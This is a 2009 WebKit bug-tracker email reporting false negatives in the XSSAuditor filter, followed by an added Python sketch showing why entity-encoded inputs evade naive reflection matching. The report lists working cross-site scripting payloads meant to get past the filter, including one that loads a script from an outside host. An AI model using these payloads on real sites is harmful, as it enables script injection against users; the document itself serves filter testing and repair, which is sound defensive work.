[Webkit-unassigned] [Bug 26708] New: XSSAuditor false negatives

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Wed Jun 24 21:57:12 PDT 2009


https://bugs.webkit.org/show_bug.cgi?id=26708

           Summary: XSSAuditor false negatives
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: All
        OS/Version: All
            Status: NEW
          Severity: Normal
          Priority: P2
         Component: WebCore JavaScript
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: abarth at webkit.org
                CC: sam at webkit.org, dbates at berkeley.edu


Gareth Heyes has been looking at our XSSAuditor and found a number of false
negatives.  We should fix them:

HTML entities:

test.php?x=%3Ca%20href%3D%26%23x0000006a%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3a%26%23x61%26%23x6c%26%23x65%26%23x72%26%23x74%26%23x28%26%23x31%26%23x29%3Etest%3Ca%3E

test.php?x=%3Cimg%20src=1%20onerror=%26%2397%26%23108%26%23101%26%23114%26%23116%26%2340%26%2349%26%2341%3E

Scheme relative paths:

test.php?x=%3Cscript%20src=//businessinfo.co.uk/labs/xss/xss.js%3E%3C/script%3E

iframe + JavaScript URL:

test.php?x=%3Ciframe%20src=javascript:alert(document.domain)%3E

HTTP-Equiv UTF-7:

test.php?x=%3Cmeta%20http-equiv=%22Content-Type%22%20content=%22text/html;%20charset=UTF-7%22%20/%3E%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-


-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug, or are watching the assignee.
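
The "HTML entities" cases above, run through a simplified reflection check. This is an added example, not WebKit's XSSAuditor code and not part of the original report. It assumes `test.php` echoes `x` into the page unescaped and that a script is flagged when its text appears in the request parameter; `ScriptCollector` and `audit` are hypothetical names.

```python
from html import unescape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The two "HTML entities" test URLs from the report above.
ENTITY_HREF = ("test.php?x=%3Ca%20href%3D%26%23x0000006a%26%23x61%26%23x76%26%23x61"
               "%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3a"
               "%26%23x61%26%23x6c%26%23x65%26%23x72%26%23x74%26%23x28%26%23x31"
               "%26%23x29%3Etest%3Ca%3E")
ENTITY_ONERROR = ("test.php?x=%3Cimg%20src=1%20onerror=%26%2397%26%23108%26%23101"
                  "%26%23114%26%23116%26%2340%26%2349%26%2341%3E")


class ScriptCollector(HTMLParser):
    """Collects attribute values that would run as script, as the parser sees them."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            # HTMLParser delivers attribute values with character references decoded,
            # which is the form a browser would hand to its script engine.
            if name.startswith("on") or value.strip().lower().startswith("javascript:"):
                self.scripts.append(value)


def audit(url, canonicalize):
    """Return the scripts in the echoed page that the check attributes to the request."""
    param = parse_qs(urlsplit(url).query)["x"][0]       # URL-decoded parameter
    page = "<html><body>" + param + "</body></html>"    # assumed: echoed unescaped
    collector = ScriptCollector()
    collector.feed(page)
    collector.close()
    # Without canonicalization the request still holds "&#97&#108...", so the decoded
    # script text never matches. Decoding entities on the request side closes the gap.
    haystack = unescape(param) if canonicalize else param
    return [script for script in collector.scripts if script in haystack]


if __name__ == "__main__":
    for url in (ENTITY_HREF, ENTITY_ONERROR):
        print("naive:", audit(url, False), "canonicalized:", audit(url, True))
```
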


